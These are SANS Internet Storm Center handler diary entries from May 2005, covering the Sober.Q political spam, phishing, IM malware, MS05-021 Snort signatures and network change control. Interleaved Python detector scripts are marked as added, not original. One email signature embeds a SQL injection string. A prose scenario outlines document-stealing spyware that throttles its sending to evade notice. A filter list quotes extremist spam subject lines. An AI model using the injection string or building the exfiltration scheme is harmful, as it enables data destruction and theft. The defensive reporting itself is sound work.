Keep an eye out for the evolution in the next few days though.


Swa Frantzen


Published: 2005-05-20

Multiple Greeting Card scams; MSFT time server; Sober next Monday; Netscape 8.01; Pharming

Multiple Greeting Card Scams

We did get reports about a couple of greeting card scams. They use different
domains (bluemountain.com, 123greetings.com). It is important to note that
these scams use different domains. If you include greeting card scams in your
awareness training, make sure to point out that they may use less known domain
names as well.

Netscape 8.01

Yesterday's diary pointed out the release of Netscape 8.0. Well, today AOL
released a security update (version 8.01). Please make sure you download it.
While initial reports of >40 bugs turned out to be inflated, there are still a few issues (about 3-5) that are fixed in 8.01.

MSFT Time Server

We have one report and some personal observations that the default Microsoft time server (time.windows.com) is having problems. If you are using this time server (it is the default time server for Windows XP installs), make sure you are still able to connect, or let us know if you see any error messages.

Sober deadline for next Monday

The version of Sober responsible for last week's outbreak of German spam is said to trigger some as of now unknown payload on Monday, May 23rd. If you know what it will do, let us know. The messages are believed to relate to this weekend's
elections in one of Germany's larger states.


Pharming: Does it exist?

We do get ongoing requests for statistics about actual "Pharming Attacks". So far, the response has been easy: "None". While the DNS cache poisoning attack from a few months ago has been called "pharming" by some, it wasn't according to our definition of the term, as it did not attempt to spoof a bank site to obtain passwords. However, pharming is a rather new term, and like other new terms it may stretch itself until it finds a purpose.


Johannes Ullrich

jullrich@';drop table email;'sans.org'

SANS Institute


Published: 2005-05-19

Phederal Phishing Offenses (FBI and a Census report)

Contributors to the ISC effort have been sending in a load of information on issues affecting their systems and networks.

We have received two reports from contributors to the ISC efforts involving US federal agencies being used as the basis for phishing.

"PH"BI (FBI) phishing

One contributor submitted information on a hack involving a php flame module ending in a phishing scam. According to the submission he was notified that a co-worker "was looking at a notice claiming to be from the FBI that they were monitoring this range of IP addresses for suspicious activity regarding financial transactions" and sure enough at the end of the phish you were asked "that you re-enter your payment data to help them track the fraudsters." The site was reported to dish up the phish intermittently "as you could hit reload 10 times before it appears again". According to the contributor "The correct URL always appeared unchanged in the browser's address bar, but the content I was looking at was nowhere in the actual documentroot directory for that domain." The contributor asked for some assistance, and any contributor who cares to toss out recommendations on security issues related to "any configuration settings that would disallow modules from being loaded" will be thanked and I'll pass them on to the person who reported this "PH"BI (FBI) phish.

The second report involves the Census Bureau. It describes a complaint that was received where "the email recipient was asked to fill out a survey after which they would be credited $5 to their bank account. At the end of the survey they were asked what bank account they would like the money deposited in." If any of our readers comes into contact with users or customers that have received this phish please email us a copy as an attachment. Thanks!

Mailbag IM attack items and family variant naming contest

A number of the submissions were about IM attack malware resulting from users being socially engineered into downloading and installing malware. So many that checking your favorite AV sites a few times daily is a good idea. As noted on Kaspersky's Diary (link below) the variants are coming out pretty often and continue to have a costly impact at networks. The most interesting IM messages that I read included "hey, this your pic" and then "hey, is this your pic on this site." The contributor went on to point out that "These message lines are followed by a URL from a site that hosts a picture rating service. If the user clicks the URL, an application disguised as a server-side PHP script downloads. The application is a variant of the Agobot / SDBOT / GaoBot Trojan Horse, which opens a backdoor on the local machine and connects the user to BOT network."

Another interesting one was "lmao you dumbass!" (Thanks Ed!). I think both will generate quite a few infections ( ; ^ ). There are
already quite a few names for these IM attacks, but there's no family name in popular use yet that I've noticed. Since "spam" is a meat, and led to "spim", and since Oscar is in a name of a relatively famous meat product and it's also used in the name of malware directed at AOL IM users (Oscarbot), I was tossing around ideas for a "family" convention for this malware, something along the lines of a name variation of "Oscar Mayer IM" (as in B O L O G N A!) but that doesn't have real cachet. Other ideas for naming this family of IM attacks would be welcome, and I have to warn you, that based on previous submissions to other questions that we have asked, I will not be able to respond to each and every suggestion we'll receive. But I'll try and get the best ones posted into a future Diary.

IM's in Kaspersky's "Analyst's

New Mytobs, and generic detections at http://www.viruslist.com/en/weblog

More on Social Engineering:

Security Update for MSN Messenger 6.1 or 6.2 (KB890261)
"A security issue has been identified that could allow an attacker to compromise your Windows-based system and gain control over it."

**NOTE** This is NOT the "Apr 12, 2005 Vulnerability in MSN Messenger Could Lead to Remote Code Execution (896597): MS05-022 Affected Software: MSN Messenger 6"

An additional note of clarification for another MS patch, we have been advised that "The issue described in Microsoft's Security Advisory (899480) is related to a Windows TCP/IP implementation flaw
http://www.frsirt.com/english/advisories/2005/0567 and NOT the IPv6 flaw which remains unpatched. See http://www.frsirt.com/english/advisories/2005/0559 "
Thanks Gilles!

I've included the link next/below for a number of reasons, principally because it's a stellar example of comprehensive information on what the malware does, thus it allows you to consider where you can implement the most detect/protect/response options suitable for your environment. Getting your own "team" to consider implementing the options is always another story. IMHO there are only a few or so vendors that publish analysis that is this good and I'd just like to thank the people at F-Secure and the other few that do this for setting such a high standard.
NAME: Sober.Q

"The All New Netscape Browser 8.0
Speed, Flexibility and More Security Choices Than Any Other Browser" Thanks Juha Matti!


Patrick Nolan, with other Handler assists and our great team of contributors!


Published: 2005-05-18

Insider threat study, and Fun in the trenches, Windows surprise update, Why is change control a good idea?

An interesting report came out of the CMU CERT

Insider Threat Study: Computer System Sabotage in Critical Infrastructure Sectors

Thanks Adrien for pointing this out.

Windows update

A new Windows Installer 3.1 has appeared in Windows update and an SUS server near you. Unannounced (as far as I am aware). Not really a security issue but it could be.

Some fun in the trenches or Why change control?

What happens when you install something new on your network and then you begin to have problems? You blame the something new right? What about when the something new is having problems and then new problems appear? You again blame that something new, especially when the something new is a firewall right? Well, it is not always the firewall's fault. If you do not know who is plugging things into your network, you'd better find out now.

Company X bought some shiny new firewalls and had a consultant put them in. Now Company X has nice shiny VPNs connecting them to their messaging and file storage with a fancy low cost WAN. Wow, everything is great. Then after some packet loss and some other issues, the VPNs were deemed really nice but not perfect. After a few adjustments they could live with it though.

...And then bang, one site starts to have intermittent connectivity loss. In fact the default gateway starts to generate ICMP Network Unreachable messages for anything off site. This comes and goes. What could that be? Well, after the new firewalls get their thrashing for being the bad new guys on the block, it is time to get out your packet sniffer and look at who is sending those ICMP messages, 'cause it is not the default gateway.

If anyone can plug anything they want into your network, they will, and if that thing happens to be a Linksys router with the same IP address as your default gateway, then you might see these ICMP net unreachables from some other MAC address than the default gateway's.

Okay, so this is basic stuff, what's the point? Part of the C-I-A triad is availability; if anyone can take your network down with a simple IP conflict then you are at risk. What else are you at risk for? The simplest resolution is to implement change control. This means many things to many people; for some in large corporations it means 24 hour follow-the-sun meetings, for others it means that someone approves any changes to the network before they are made and that each change is recorded and verified. This way, that new network printer does not get blamed when the VPNs go down.
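The hunt described above (who is really sending those ICMP net unreachables?), as an added example that is not part of the diary: a Python script that parses lines in the shape of `tcpdump -e -n icmp` output and reports every MAC address that emits frames with the gateway's source IP other than the gateway's own MAC. The capture lines, IP addresses and MAC addresses are constructed for the example; on a real network you would feed it the output of `tcpdump -e -n icmp` taken from a span port or the switch the gateway hangs off.

```python
import re
from collections import defaultdict

# Constructed sample of `tcpdump -e -n icmp` style output (not a real capture):
# the genuine gateway is 10.0.0.1 at 00:11:22:33:44:55; a rogue box plugged in
# with the same IP answers from its own MAC 00:0c:41:de:ad:01.
SAMPLE_CAPTURE = """\
09:14:01.100000 00:11:22:33:44:55 > 00:aa:bb:cc:dd:01, ethertype IPv4 (0x0800), length 98: 10.0.0.1 > 10.0.0.25: ICMP echo reply, id 1, seq 1, length 64
09:14:02.200000 00:0c:41:de:ad:01 > 00:aa:bb:cc:dd:01, ethertype IPv4 (0x0800), length 70: 10.0.0.1 > 10.0.0.25: ICMP net 198.51.100.0 unreachable, length 36
09:14:02.300000 00:0c:41:de:ad:01 > 00:aa:bb:cc:dd:02, ethertype IPv4 (0x0800), length 70: 10.0.0.1 > 10.0.0.31: ICMP net 198.51.100.0 unreachable, length 36
09:14:03.400000 00:aa:bb:cc:dd:01 > 00:11:22:33:44:55, ethertype IPv4 (0x0800), length 98: 10.0.0.25 > 10.0.0.1: ICMP echo request, id 1, seq 2, length 64
"""

# One tcpdump -e -n line: timestamp, src MAC > dst MAC, ethertype, src IP > dst IP, ICMP text.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<smac>[0-9a-f:]{17}) > (?P<dmac>[0-9a-f:]{17}), "
    r"ethertype IPv4 \(0x0800\), length \d+: "
    r"(?P<sip>[\d.]+) > (?P<dip>[\d.]+): ICMP (?P<msg>.*?), length \d+$"
)

def parse_capture(text):
    """Parse tcpdump -e -n lines into dicts; lines in any other format are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records

def macs_claiming_ip(records, ip):
    """Map each source MAC that has sent frames as `ip` to its frame count."""
    counts = defaultdict(int)
    for r in records:
        if r["sip"] == ip:
            counts[r["smac"]] += 1
    return dict(counts)

def find_rogue_gateway(records, gateway_ip, gateway_mac):
    """Return {rogue_mac: [ICMP messages]} for frames sent as gateway_ip by any
    MAC other than the real gateway's.  Two MACs for one IP is the IP conflict."""
    rogues = defaultdict(list)
    for r in records:
        if r["sip"] == gateway_ip and r["smac"].lower() != gateway_mac.lower():
            rogues[r["smac"]].append(r["msg"])
    return dict(rogues)

if __name__ == "__main__":
    recs = parse_capture(SAMPLE_CAPTURE)
    for mac, msgs in find_rogue_gateway(recs, "10.0.0.1", "00:11:22:33:44:55").items():
        print(f"{mac} is answering as 10.0.0.1: {len(msgs)} frames, e.g. {msgs[0]!r}")
```

The MAC is the only thing the rogue box cannot share with the real gateway, so keying on it is what turns "the gateway is flapping" into "somebody plugged in a second gateway"; the first three octets of the rogue MAC (the OUI) will usually tell you the vendor of what they plugged in.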

Dan Goldberg
MADJiC Consulting, Inc.
dan /@/ madjic /dot/ net


Published: 2005-05-17

Corporate Espionage Made Easy with Spyware; Honeynet KYE: Phishing paper Published; Some New Vulnerabilities

Corporate Espionage Made Easy with Spyware

For now most spyware (of the more malicious variety) simply tries to steal passwords to banking sites, social security numbers, and the like. This is part of the ongoing trend of malicious online activity being driven by money. Spam would not be taking place if people were not making money off of it. The only reason you would want to steal someone's online banking information is for the money in it. Here's a new scenario, one I think we'll be seeing sooner or later.

- Take standard spyware that installs a keylogger.

- Throw the keylogger part out.

- Put in easily coded software that will mail out any documents (.xls, .doc, etc) that it finds on the system.

- Throttle the sending so it either doesn't swamp the mail server and escapes detection, or send it all at once, hoping the human response time won't be fast enough to stop it.

You can tighten the example any way you want. Have the software only work if the system is on a certain domain (say .microsoft.com), have it send only on weekends when people are less likely to notice a slow machine or lots of e-mail, etc. If you are an organization that has trade secrets or confidential information, do you monitor and/or control what e-mails make it out of your organization? You should start. I haven't seen any real-world examples; if you have, let me know. Also send me feedback and your thoughts (bambenek -at- gmail -dot- com).
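One shape the outbound monitoring asked about above could take, as an added example that is not part of the diary: a small Python detector run over outbound mail-gateway records. The record format, the addresses and the file names are constructed for the example (a real gateway log would need its own parser); the logic is what matters: count office-document attachments per sender leaving to external domains inside a sliding time window, and note off-hours sending, which is exactly the knob the hypothetical malware would tune.

```python
from collections import defaultdict
from datetime import datetime

# Constructed outbound mail-gateway records for the example (not a real log).
# Assumed format, one message per line: timestamp|sender|recipient|attachment;attachment
SAMPLE_LOG = """\
2005-05-14T02:10:05|alice@example.com|drop@mail.example.net|Q1_forecast.xls
2005-05-14T02:10:09|alice@example.com|drop@mail.example.net|board_minutes.doc
2005-05-14T02:10:14|alice@example.com|drop@mail.example.net|merger_plan.doc;pricing.xls
2005-05-14T02:10:20|alice@example.com|drop@mail.example.net|payroll.xls
2005-05-14T09:30:00|bob@example.com|partner@customer.example|proposal.doc
2005-05-14T09:45:00|bob@example.com|carol@example.com|team_photo.jpg;notes.doc
2005-05-14T10:02:00|bob@example.com|partner@customer.example|
"""

DOC_EXTS = (".doc", ".xls", ".ppt")  # the document types the scenario has the malware harvesting

def document_attachments(names):
    """Keep only attachment names with an office-document extension (case-insensitive)."""
    return [n for n in names if n.lower().endswith(DOC_EXTS)]

def parse_log(text):
    records = []
    for line in text.splitlines():
        ts, sender, rcpt, atts = line.split("|")
        records.append({
            "time": datetime.fromisoformat(ts),
            "sender": sender,
            "rcpt_domain": rcpt.split("@", 1)[1],
            "docs": document_attachments(atts.split(";")) if atts else [],
        })
    return records

def is_off_hours(t, start_hour=22, end_hour=6):
    """True between 22:00 and 06:00, when nobody is around to notice a slow machine."""
    return t.hour >= start_hour or t.hour < end_hour

def flag_exfiltration(records, internal_domain, max_docs=3, window_seconds=600):
    """Return {sender: [reasons]} for senders that push >= max_docs office documents
    to external domains within any window_seconds-long window.  Keying on the
    sending host's IP instead of the From address works the same way and is
    harder for malware to forge."""
    per_sender = defaultdict(list)
    for r in records:
        if r["rcpt_domain"] != internal_domain and r["docs"]:
            per_sender[r["sender"]].append(r)

    findings = {}
    for sender, msgs in per_sender.items():
        msgs.sort(key=lambda r: r["time"])
        start, docs_in_window = 0, 0
        for msg in msgs:
            docs_in_window += len(msg["docs"])
            # slide the window start forward until the window fits in window_seconds
            while (msg["time"] - msgs[start]["time"]).total_seconds() > window_seconds:
                docs_in_window -= len(msgs[start]["docs"])
                start += 1
            if docs_in_window >= max_docs:
                reasons = [f"{docs_in_window} document attachments to external domains within {window_seconds}s"]
                if is_off_hours(msg["time"]):
                    reasons.append("sent outside business hours")
                findings[sender] = reasons
                break
    return findings

if __name__ == "__main__":
    for sender, reasons in flag_exfiltration(parse_log(SAMPLE_LOG), "example.com").items():
        print(sender, "->", "; ".join(reasons))
```

The threshold and window are the tuning knobs: a malware author who drips one document an hour stays under `max_docs=3` per ten minutes, which is why a second, longer window (documents per day per host) is worth running beside this one.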

Honeynet KYE: Phishing paper Published

The Honeynet Project published a "Know Your Enemy: Phishing" paper today. The paper focuses on observed examples and goes in-depth to analyze the intent and methods of phishers in getting information. The paper is available here:

Some New Vulnerabilities

None are huge issues but shouldn't be left unaddressed.

- Microsoft Windows XP/2003 IPv6 Remote Denial of Service Exploit

- Linux Kernel 2.6.x "ioctl_by_bdev()" Local Denial of Service Exploit

- procps vmstat "p" Argument Local Stack Overflow PoC Exploit

- Gaim 1.2.x URL Handling Remote Buffer Overflow PoC Exploit


John Bambenek

bambenek -at- gmail -dot- com


Published: 2005-05-16

German Spam (concise version); MS05-021 and Snort Signatures; Is it a security problem?

German Spam (Concise Version)

These first two sections were provided by yesterday's handler on duty, Scott Fendley. Thanx, Scott.

As there are still many emails coming in concerning the German Spam diary yesterday, we are going to provide a little more concise version of the information (or as concise as I can be). The longer version of the diary is located at http://isc.sans.org/diary.php?date=2005-05-15 .

On Saturday evening (Sunday Morning UTC), a large number of "German Spams" were sent all over the world. As the details of this unfolded (see http://www.viruslist.com/en/weblog for the initial analysis), it was discovered that a recent variation of the Sober virus had downloaded new functionality and was proceeding with spamming political propaganda to any addresses gathered from the infected computer. Many anti-virus companies are calling this new malware Sober.Q. A (mostly) complete list of anti-virus references will follow this brief.

The spammed emails do not at this time appear to have any viral content, just links to German-based websites that have been characterized as pro-neo-Nazi, racist, anti-immigrant and/or generally right-wing extremist. The timing of this attack coincides with an election in the state of North Rhine-Westphalia and also the anniversary of the end of World War II in Europe, and may serve as the motivation for the spam. As the virus does not appear to do any filtering of email addresses to direct it only to German speakers, or even to the German .de top-level domain, many networks have reported receiving a staggering number of emails in other parts of the world.

Last year, the Sober.G virus was also used to spam political content prior to the European Parliament election. More recently, Sober.N was used to infect computers while enticing the recipient that they had won World Cup soccer tickets for 2006 which may have been

In yesterday's diary, Eric Conrad kindly provided postfix regex, and spam assassin rules that could be useful in stemming the impact of this junk email using the common subject lines. Additionally, Dirk Mueller also released a filtering technique that does not rely on the subject lines. Please take a look at http://isc.sans.org/diary.php?date=2005-05-15 near the 20:30 UTC update for this information.

Some users have reported mini Denial of Service attacks due to the German spam involving the email based text messaging on cell phone and blackberry devices. Others have seen large amounts of bounced email as the virus forges the from address of email it sends out.

Antivirus Links:







Update: 2005-05-17 17:15 UTC

Several of our readers have pointed out, that filtering based on the URLs in the body of the e-mail has proven more effective than filtering on the subject lines, since the subject lines seem to change more rapidly, while the URLs in the body have remained static. We just wanted to pass this info on to those still fighting significant amounts of this spam. Also, another of our readers, Frank, has had excellent success by looking at some of the other headers generated by the Sober.Q SMTP engine. See http://www.viruswatch.nl/info/soberq_filter.html for more info on this technique.

MS05-021 and Snort Signatures

Today, one of the Unisog readers posed a question to me (Scott still) about whether anyone else had been seeing exploitation of MS05-021 recently. At the time, I did not have a snort signature so I had not seen it. Hugues De Payens threw one together and later found that Erik Fichtner had added one to Bleeding-Edge Snort (which is below).

So as you can tell, I have been a bad handler by not keeping my signatures up to date in snort. I guess I will get slapped on the hand with a ruler by the school marm of the Storm Center soon. But I digress...

So is anyone seeing active wide-spread attacks against machines using the MS05-021 vulnerability?

For more information about the exploit, please see: http://www.securiteam.com/exploits/5XP0F2KFGA.html

The series of Bleeding Edge Snort Sigs (thanks to http://www.bleedingsnort.com/ )

alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"BLEEDING-EDGE EXPLOIT MS05-021 Exchange Link State - Possible Attack"; content: "X-LINK2STATE"; nocase; flow:to_server,established; reference:cve,CAN-2005-0560; reference:url,isc.sans.org/diary.php?date=2005-04-12; reference:url,www.microsoft.com/technet/security/bulletin/MS05-021.mspx; classtype:misc-activity; sid:2001848; rev:2;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 691 (msg:"BLEEDING-EDGE EXPLOIT MS05-021 Exchange Link State - Possible Attack"; content:"X-LSA-2"; nocase; flow:to_server,established; reference:cve,CAN-2005-0560; reference:url,isc.sans.org/diary.php?date=2005-04-12; reference:url,www.microsoft.com/technet/security/bulletin/MS05-021.mspx; classtype:misc-activity; sid:2001849; rev:2;)

alert tcp any any -> $SMTP_SERVERS 25 (msg: "BLEEDING-EDGE EXPLOIT MS Exchange Link State Routing Chunk (maybe MS05-021)"; content:"X-LINK2STATE"; nocase; content:"CHUNK="; nocase; flow:to_server, established; flowbits:set,msxlsa; threshold: type limit, track by_src, count 1, seconds 60; reference:cve,CAN-2005-0560; reference:url,isc.sans.org/diary.php?date=2005-04-12; reference:url,www.microsoft.com/technet/security/bulletin/MS05-021.mspx; classtype:misc-activity; sid:2001873; rev:3;)

alert tcp any 25 -> $EXTERNAL_NET any (msg:"BLEEDING-EDGE EXPLOIT TCP Reset from MS Exchange after chunked data, probably crashed it (MS05-021)"; flags:R; flowbits:isset,msxlsa; flowbits:unset,msxlsa; reference:cve,CAN-2005-0560; reference:url,isc.sans.org/diary.php?date=2005-04-12; reference:url,www.microsoft.com/technet/security/bulletin/MS05-021.mspx; classtype:misc-activity; sid:2001874; rev:3;)

pass tcp $SMTP_SERVERS 25 -> any any (msg:"BLEEDING-EDGE EXPLOIT MS Exchange chunks accepted"; content:"200 DONE"; nocase; flowbits:isset,msxlsa; flow:from_server,established; flowbits:unset,msxlsa; reference:cve,CAN-2005-0560; reference:url,isc.sans.org/diary.php?date=2005-04-12; reference:url,www.microsoft.com/technet/security/bulletin/MS05-021.mspx; classtype:misc-activity; sid:2001875; rev:3;)

alert tcp $SMTP_SERVERS 25 -> any any (msg:"BLEEDING-EDGE EXPLOIT MS Exchange disliked link state chunk, but didn't die (MS05-021)"; content: "500 DROP"; nocase; flowbits:isset,msxlsa; flow:from_server,established; flowbits:unset,msxlsa; reference:cve,CAN-2005-0560; reference:url,isc.sans.org/diary.php?date=2005-04-12; reference:url,www.microsoft.com/technet/security/bulletin/MS05-021.mspx; classtype:misc-activity; sid:2001876; rev:3;)

Is it a security problem?

Jim here with a few thoughts from my day job. This weekend/morning was not a good one for hardware. I had both a server and a firewall suffer from disk problems. The firewall is a small appliance for a remote office (the disk is virtually inaccessible and it is easier to replace the entire appliance than just the disk). It is a model that is no longer manufactured, though it is still "under service." We've been seeing disk errors in the logs since Friday, so we contacted our service provider and they shipped out a newer model. Unfortunately, when the new box arrived on site, the power cord that was shipped with it didn't work with that model. So, they are finding another of the older model and shipping it out; it should arrive on site momentarily. Sigh.... Fortunately, the machine has remained up since being power cycled this morning. Is it a security problem? It isn't malware or an intrusion, but when it goes, this remote office is off the air.

We also had a disk go bad on a server over the weekend. We were doing all the right things, the disks were mirrored and (supposedly) hot-swappable. The maintenance provider was called out and came to replace the disk. Unfortunately, our logs show that within one second of the hot-swappable disk being plugged in, we start showing errors on the 3 other disks in the machine. The machine, that had still been running on the mirrored disks, came down hard at that point. I guess the moral of this part of the story is that just because a device/component claims to be hot-swappable doesn't mean it works that way in real life. Fortunately, the tech on site was able to get the machine back up in relatively short order. With all this excitement on the day job, it is probably a good thing that most of the e-mail to the handlers today was related to the German spam and Scott has handled that admirably. Thank you again, Scott.


Scott Fendley and Jim Clausing, sfendley and jclausing, respectively (@isc.sans.org)


Published: 2005-05-15

German Spam...Maybe?; Academia Security Awareness

German Spam...Maybe?

Since taking over as handler on duty, I have had a perplexing question that I am trying to understand. Somehow in the past 4-5 hours (as of 5am UTC), I have received a number of "German spams". Getting spam is not an overly out of the ordinary thing for me as I do sift through many mailing lists and work email address aliases that are published on websites here and there. However, I do not remember the last time I had a German Spam show up in my inbox. Chinese, or other Southeast Asian spams do happen some, but I would suspect that English is the primary type of spam we all see.

Well the thing that has struck me is that several of my accounts have now received maybe 15 or 20 different German spams. Each message involves a different set of URLs and has URL(s) to various German news or personal editorial sites (I think).

My real question is whether or not there is something odd on the web pages people may be clicking on or in the email? So far I do not see anything odd (like IFRAME junk or similar.) So is there a piece of malware that is being used to relay this junk? I suspect so. But what is it? No clue. Are there any other motives other than to spam it out? I don't see a money trail, but that does not mean it is not there.

So to our readers, has anyone else seen a sudden influx of what might outwardly look like German Spam, that may actually have some actual interesting security connections that we need to be aware of before Monday gets here?

Any of you know of a new piece of malware that might be causing some of this, or perhaps old botnet machines being used as spam proxies suddenly?
Updated 13:00 UTC --

It would appear that this may be related to the Sober.Q virus per


Thanks to everyone that responded this morning (overnight for me) with comments and reports of seeing the same thing that I was.

Updated 14:00 UTC --

Some of our readers, who understand German, have visited the sites being sent out and have reported the gist of the content on these sites. As this is the 60th anniversary of the end of World War II, there are many celebrations in some locations, and a lot of respect is ceremonially given to those who fought in this war and gave up their lives on the battlefield in many European countries. So, many of the sites appear to be related to "antiracism and nazis propaganda". Others have mentioned that this is the "extreme right wing", "Nazi views", and "NeoNazi propaganda." As I do not read German, I cannot verify this. But I am going to trust our German-speaking friends in that respect. But this does remind me of Sober.G from last year.
Another reader (or 3) appears to have had mini-DoS attacks on cell phones and blackberries involving the German spam being delivered as SMS. Thanks to Jim Mejia and Rich for your reports. For readers that pay to receive text messages on their phones, I highly recommend talking to your provider to make sure you will not have to pay for this junk email that was not filtered out. Thankfully, my provider only charges when I send text messages out, so I will not have to deal with an unusually bloated bill.
Updated 15:00 UTC --

One of our readers, Eric provided a postfix regex file that can be used to filter these German spams. Thanks for this Eric.

*** As the postfix regex file has had several more subject lines added to it in the following update, I have removed this section and placed the most current info in the next update section. ***
Updated 20:30 UTC --

This will probably be the last update I will do on the subject of the German spam. As this is the 60th anniversary of the end of WWII, I had guessed that the propaganda was more in response to the events of many years ago. It may still be related, but several of our German speakers have noted a couple of details that might point the motivation in another direction. Apparently there is an election coming up in the most populous state in Germany on May 22nd. The state parliament election (Landtagswahl) in Nordrhein-Westfalen appears to be the most likely case, as Sober.G last June also had an element of spamming associated with it prior to the European Parliament election in 2004. Thanks to Philipp Krenn for some of the information about the current election connection.

*I really hope that people are not so naive as to be swayed in their votes for their elected officials on account of spam. And I will never trust the political views of a malware writer. So I hope and pray that if the virus and spam were meant to sway the votes of the people in the way that the Madrid terrorist activity last year did, then the people of Germany would have the courage and wisdom to vote as they truly believe, not the way others would have them believe.*
During the 1500 update, Eric Conrad sent in a set of subject line filters for postfix. Later he sent an updated list, and both the original list and the updated list showed up on http://www.dslreports.com/forum/remark,13410941 . Thanks Eric for supplying this.

The postfix regex file is typically enabled via the main.cf of postfix like this.

header_checks = regexp:/usr/local/etc/postfix/headfilt.regex

And the contents of this file, I believe, involve tab delimiting (which the diary doesn't maintain easily). So please be aware you may have to put a tab or something between the subject and the HOLD command.

----- headfilt.regex file contents -------
/^Subject:.*Armenian Genocide Plagues Ankara/ HOLD
/^Subject:.*Augen auf/ HOLD
/^Subject:.*Auslaender bevorzugt/ HOLD
/^Subject:.*Auslaenderpolitik/ HOLD
/^Subject:.*Blutige Selbstjustiz/ HOLD
/^Subject:.*Can you believe this still happens today/ HOLD
/^Subject:.*Deutsche Buerger/ HOLD
/^Subject:.*Deutsche werden kuenftig beim/ HOLD
/^Subject:.*Dresden 1945 / HOLD
/^Subject:.*Dresden Bombing Is To Be Regretted Enormously/ HOLD
/^Subject:.*Du wirst ausspioniert/ HOLD
/^Subject:.*Du wirst zum Sklaven gemacht/ HOLD
/^Subject:.*Gegen das Vergessen/ HOLD
/^Subject:.*Graeberschaendung auf bundesdeutsche/ HOLD
/^Subject:.*Hier sind wir Lehrer die einzigen Auslaender/ HOLD
/^Subject:.*Jahre Befreiung/ HOLD
/^Subject:.*Massenhafter Steuerbetrug durch auslaendische/ HOLD
/^Subject:.*Multi\-Kulturell/ HOLD
/^Subject:.*Osteuropaeer durch Fischer-Volmer Erlass/ HOLD
/^Subject:.*Paranoider Deutschenmoerder kommt/ HOLD
/^Subject:.*Polizei schlaegt Alarm/ HOLD
/^Subject:.*Schily ueber Deutschland/ HOLD
/^Subject:.*Transparenz ist das Mindeste/ HOLD
/^Subject:.*Trotz Stellenabbau/ HOLD
/^Subject:.*Tuerkei in die/ HOLD
/^Subject:.*Turkish Tabloid Enrages Germany with Nazi Comparisons/ HOLD
/^Subject:.*Verbrechen der deutschen Frau/ HOLD
/^Subject:.*Volk wird nur zum zahlen/ HOLD
/^Subject:.*Vorbildliche Aktion/ HOLD
/^Subject:.*Whore Lived Like a German/ HOLD
/^Subject:.*wirst ausspioniert/ HOLD
---- end of file contents ------
Eric also has a ready-made SpamAssassin set of subject rules to adjust the scoring for this virus. As this file is a little long, I would be happy to send it to you on request. But generally, each line takes a subject line from above and transforms it like the following

header SOBER_Q_SUBJ7 Subject =~ /Deutsche Buerger/
describe SOBER_Q_SUBJ7 Subject is from Sober.Q worm
score SOBER_Q_SUBJ7 3.0
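To check a table like the one above before it goes into production, here is an added Python harness; it is not part of the diary or of Eric Conrad's files. It parses Postfix's `/pattern/flags action` regexp-table syntax and applies it to header lines the way Postfix does: entries are tried in order and the first match wins, matching is case-insensitive unless the `i` flag is given, comment and blank lines are ignored, and any whitespace (a tab or a space) separates pattern from action, so the tab question above is moot. The table slice and the sample headers are constructed for the example; drop in your full headfilt.regex to test it, and the same `check_header` call with a bare `/Deutsche Buerger/` pattern shows what the SpamAssassin `header` rule would hit.

```python
import re

# A slice of the header_checks table above, reproduced as constructed input so the
# harness runs offline.  One entry uses a tab, the others a space, between pattern
# and action; one (Dresden 1945 ) carries the trailing space from the diary.
TABLE = (
    "# comment lines and blank lines are ignored by Postfix\n"
    "/^Subject:.*Augen auf/ HOLD\n"
    "/^Subject:.*Deutsche Buerger/\tHOLD\n"
    "/^Subject:.*Multi\\-Kulturell/ HOLD\n"
    "\n"
    "/^Subject:.*Dresden 1945 / HOLD\n"
)

# Postfix regexp table entry: /pattern/flags action.  Flags: i toggles case
# sensitivity (matching is case-INsensitive by default, so /.../i makes it
# sensitive), x = extended syntax, m = multi-line (accepted, not needed here).
ENTRY_RE = re.compile(r"^/(.*)/([imx]*)\s+(\S.*)$")

def load_table(text):
    """Parse a Postfix regexp header_checks table into [(compiled_regex, action)]."""
    rules = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = ENTRY_RE.match(stripped)
        if not m:
            raise ValueError(f"line {lineno}: not a '/pattern/ action' entry: {line!r}")
        pattern, flags, action = m.groups()
        re_flags = 0 if "i" in flags else re.IGNORECASE
        if "x" in flags:
            re_flags |= re.VERBOSE
        rules.append((re.compile(pattern, re_flags), action.strip()))
    return rules

def check_header(rules, header_line):
    """Postfix semantics: first matching entry wins; None means the header passes."""
    for regex, action in rules:
        if regex.search(header_line):
            return action
    return None

def check_message(rules, headers):
    """Run every header line of a message through the table; return (line, action) of the first hit."""
    for line in headers:
        action = check_header(rules, line)
        if action:
            return line, action
    return None

if __name__ == "__main__":
    rules = load_table(TABLE)
    sample = ["From: someone@example.invalid", "Subject: Re: AUGEN AUF! Das ist wichtig"]
    print(check_message(rules, sample))
```

Two things the harness makes visible: the `^Subject:` anchor means the same words in a `From:` line do not match, and the entry with a trailing space only fires when a space follows "1945", so a subject ending in "Dresden 1945" slips past it.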

-- Updated May 16

Okay. I lied. One more update and I am done.

One of our readers pointed out that the below website has a way to filter Sober-P without relying on the subject line filters. So here is another option if this thing is still spamming into Monday morning work days. Thanks Dirk Mueller for this.


Academia Security Awareness

At last, some peace and quiet has arrived on my university campus. The ResNet is effectively empty for a few weeks until our first summer session. So despite the virus/spam junk from this morning/last night, I am looking forward to what we can do better on my campus.

For those of us that work in a sometimes more challenging environment, now is the time to start developing a strategy of how to deal better with the return of infected student computers this fall.

On my campus, I know that we have a small list of things we need to do better.
1) Push students to install patches and current AntiVirus software.

2) Spyware prevention measures (for us this is going to be a part of our new AV version used on campus).

3) Local password complexity problems. (I think this is the root of my botnet activity recently)

4) Better way of notifying students about security events on campus. ***
So to those in academia, "What appears to be your biggest problems you believe need to be addressed before the fall semester?", "What ideas do you have on communicating to your students effectively about security?", and "What can you do to push the students into a better security posture the day they arrive on campus?". If you have ideas, please send them to sfendley _at_ isc.sans.org .

I will be compiling the answers over the next week for a report to all next week.
*** It is amazing to me that students refuse to read information coming to them via email from campus administration, or through the student newspaper. But sidewalk chalking still appears to be the preferred method by the students. I am still unsure about how well students really pay attention to closed circuit announcement TV system.


Published: 2005-05-14

Chat Logs Location; Microsoft Security Advisories

Chat Logs Location

Regarding the location of the various IM logs requested, several readers have responded. Below is a summary of the log locations gathered:

